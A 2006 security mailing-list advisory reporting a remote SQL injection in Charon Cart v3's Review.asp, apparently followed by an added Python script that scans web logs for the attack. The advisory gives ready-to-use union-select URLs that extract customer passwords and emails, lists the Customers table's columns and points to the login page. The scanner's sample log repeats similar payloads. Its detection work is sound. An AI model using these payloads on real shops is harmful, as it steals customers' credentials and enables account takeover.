Computer Security
[EN] securityvulns.ru

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 19.09.2006
Subject: Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.charon.co.uk

# Exploit;

*******************************************************************************

###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]

Example:

//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]

Columns;
CustomerID
CustomerEmail
CustomerPassword
ShipCountry
Phone
.........
....
# ajann,Turkey
# ...
# Im not Hacker!
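
A defender-side check for the request pattern reported above, as an added example that is not part of the original advisory or the vendor's code: it scans web server log lines for Review.asp requests whose ProductID is not a plain integer, including repeated and double-encoded parameters. The log layout, the sample lines and the digit-only rule for product IDs are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

PAGE = "review.asp"                    # script named in the advisory
PARAM = "productid"                    # ASP reads query-string keys case-insensitively
VALID_ID = re.compile(r"[0-9]{1,9}")   # assumption: product IDs are small positive integers

# Constructed sample in IIS W3C style (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2006-09-19 10:01:02 GET /shop/Review.asp ProductID=42 198.51.100.7 200
2006-09-19 10:01:09 GET /shop/Review.asp ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers 203.0.113.9 200
2006-09-19 10:01:15 GET /shop/Review.asp ProductID=7&productid=-1%2520union%2520select%2520CustomerPassword%2520from%2520Customers 203.0.113.9 500
2006-09-19 10:02:00 GET /shop/login.asp - 198.51.100.7 200
"""

def product_id_ok(raw: str) -> bool:
    """Allow-list check: the whole value must be ASCII digits, nothing else."""
    return VALID_ID.fullmatch(raw) is not None

def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding (e.g. %2520) so the check sees the final text."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_text: str):
    """Return (client_ip, decoded_value) for each Review.asp hit with a non-numeric ProductID."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue                   # skip W3C directives and short lines
        stem, query, client = fields[3], fields[4], fields[5]
        if not stem.lower().endswith("/" + PAGE):
            continue
        # parse_qsl keeps every occurrence, so a benign first value cannot hide a second one
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() == PARAM and not product_id_ok(fully_decode(value)):
                findings.append((client, fully_decode(value)))
    return findings

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}  suspicious ProductID: {value!r}")
```

The same digit-only rule belongs in the application itself, applied to ProductID before it reaches the database, together with a parameterized query.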
